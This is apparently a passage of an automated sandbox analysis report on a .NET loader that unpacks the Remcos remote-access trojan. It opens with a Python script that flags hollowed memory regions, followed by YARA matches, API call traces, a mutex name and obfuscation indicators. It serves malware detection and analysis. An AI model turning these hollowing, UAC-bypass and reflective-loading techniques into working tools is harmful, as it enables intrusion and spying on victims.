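    "00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp",
    "00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp",
    "00000003.00000002.4150350434.00000000011F0000.00000004.00000020.00020000.00000000.sdmp",
]

# Win32 memory constants (winnt.h).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
WRITABLE_EXEC = {0x40, 0x80}

# Assumed field layout of the identifier (this example's reading of the names above):
# <proc>.<dump>.<id>.<base>.<protect>.<unlabelled>.<type>.<unlabelled>.sdmp
DUMP_RE = re.compile(
    r"^(?P<proc>[0-9A-F]{8})\.(?P<dump>[0-9A-F]{8})\.(?P<id>\d+)\.(?P<base>[0-9A-F]{16})"
    r"\.(?P<protect>[0-9A-F]{8})\.[0-9A-F]{8}\.(?P<type>[0-9A-F]{8})\.[0-9A-F]{8}\.sdmp$",
    re.IGNORECASE,
)


def decode_dump_id(name, image_bases=(0x400000,)):
    """Decode one .sdmp identifier into named attributes plus two verdict flags."""
    m = DUMP_RE.match(name)
    if not m:
        raise ValueError(f"not a dump identifier: {name!r}")
    protect = int(m.group("protect"), 16) & 0xFF  # drop PAGE_GUARD/NOCACHE/WRITECOMBINE bits
    mtype = int(m.group("type"), 16)
    base = int(m.group("base"), 16)
    rwx_private = protect in WRITABLE_EXEC and mtype == 0x20000
    return {
        "process": int(m.group("proc"), 16),
        "base": base,
        "protect": PAGE_PROTECT.get(protect, hex(protect)),
        "type": MEM_TYPE.get(mtype, hex(mtype)),
        # Writable+executable private memory is already a strong sign of unpacked code.
        "rwx_private": rwx_private,
        # At the image base it means the original image mapping was replaced:
        # a real loaded image is MEM_IMAGE, never MEM_PRIVATE.
        "hollowed_image": rwx_private and base in image_bases,
    }


def triage(names):
    """Return the decoded records that are private RWX, in the order given."""
    recs = [dict(name=n, **decode_dump_id(n)) for n in names]
    return [r for r in recs if r["rwx_private"]]


if __name__ == "__main__":
    for r in triage(DUMP_IDS):
        print(f"proc {r['process']} base {r['base']:#x} {r['protect']} {r['type']} "
              f"hollowed_image={r['hollowed_image']}")
```

Run against the identifiers in this report, only the process-3 region at 0x400000 is flagged; the process-0 regions that also match the rules are PAGE_READWRITE heap holding the not-yet-executed payload, which is the .NET loader stage before injection.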

                  Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0041CA6D SystemParametersInfoW
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0041CA73 SystemParametersInfoW

                  System Summary

Source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 6784, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 5932, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 0_2_027640F0
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 0_2_027652E7
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 0_2_02765670
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 0_2_058B12B0
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 0_2_058BAE38
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 0_2_058B7E40
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 0_2_058B6B70
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 0_2_058BB0B8
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 0_2_058BB0C8
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 0_2_058B12A0
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 0_2_058BA228
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 0_2_058BAE28
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 0_2_058B7E31
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 0_2_058B6B31
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 0_2_058B6B61
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0043706A
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_00414005
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0043E11C
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_004541D9
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_004381E8
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0041F18B
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_00446270
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0043E34B
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_004533AB
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0042742E
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_00437566
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0043E5A8
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_004387F0
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0043797E
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_004339D7
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0044DA49
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_00427AD7
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0041DBF3
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_00427C40
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_00437DB3
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_00435EEB
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0043DEED
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_00426E9F
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: String function: 00402093 appears 50 times
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: String function: 00401E65 appears 35 times
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: String function: 00434E70 appears 54 times
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: String function: 00434801 appears 41 times
Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1713733444.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs 6Ctc0o7vhqKgjU7.exe
Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs 6Ctc0o7vhqKgjU7.exe
Source: 6Ctc0o7vhqKgjU7.exe, 00000000.00000002.1720728405.0000000009E00000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs 6Ctc0o7vhqKgjU7.exe
Source: 6Ctc0o7vhqKgjU7.exe | Binary or memory string: OriginalFilenameIHh.exe: vs 6Ctc0o7vhqKgjU7.exe
Source: 6Ctc0o7vhqKgjU7.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 3.2.6Ctc0o7vhqKgjU7.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.1715079039.0000000003791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.1715079039.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 6784, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: 6Ctc0o7vhqKgjU7.exe PID: 5932, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6Ctc0o7vhqKgjU7.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, d68QmCbgVnawm6LGVN.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, p7aB8EXlIRHFNRDxQx.cs | Security API names: _0020.SetAccessControl
Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, p7aB8EXlIRHFNRDxQx.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, p7aB8EXlIRHFNRDxQx.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@5/3@1/2
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\6Ctc0o7vhqKgjU7.exe.log
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-35QZU7
Source: 6Ctc0o7vhqKgjU7.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 6Ctc0o7vhqKgjU7.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 6Ctc0o7vhqKgjU7.exe | ReversingLabs: Detection: 34%
Source: 6Ctc0o7vhqKgjU7.exe | String found in binary or memory: "images/addnew.png
Source: unknown | Process created: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe "C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe"
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Process created: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe "C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe"
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Process created: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe "C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe"
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Process created: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe "C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe"
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Process created: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe "C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe"
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: 6Ctc0o7vhqKgjU7.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 6Ctc0o7vhqKgjU7.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

Source: 6Ctc0o7vhqKgjU7.exe, Form1.cs | .Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 0.2.6Ctc0o7vhqKgjU7.exe.9e00000.2.raw.unpack, p7aB8EXlIRHFNRDxQx.cs | .Net Code: sS9BYG5H8B System.Reflection.Assembly.Load(byte[])
Source: 0.2.6Ctc0o7vhqKgjU7.exe.51a0000.1.raw.unpack, XlF5VlCIHRSQX8M5eh.cs | .Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.6Ctc0o7vhqKgjU7.exe.37d0e28.0.raw.unpack, XlF5VlCIHRSQX8M5eh.cs | .Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_00457186 push ecx; ret 3_2_00457199
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_0041C7F3 push eax; retf 3_2_0041C7FD
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_00457AA8 push eax; ret 3_2_00457AC6
Source: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe | Code function: 3_2_00434EB6 push ecx; ret 3_2_00434EC9
Source: 6Ctc0o7vhqKgjU7.exe | Static PE information: section name: .text entropy: 7.838238330749531
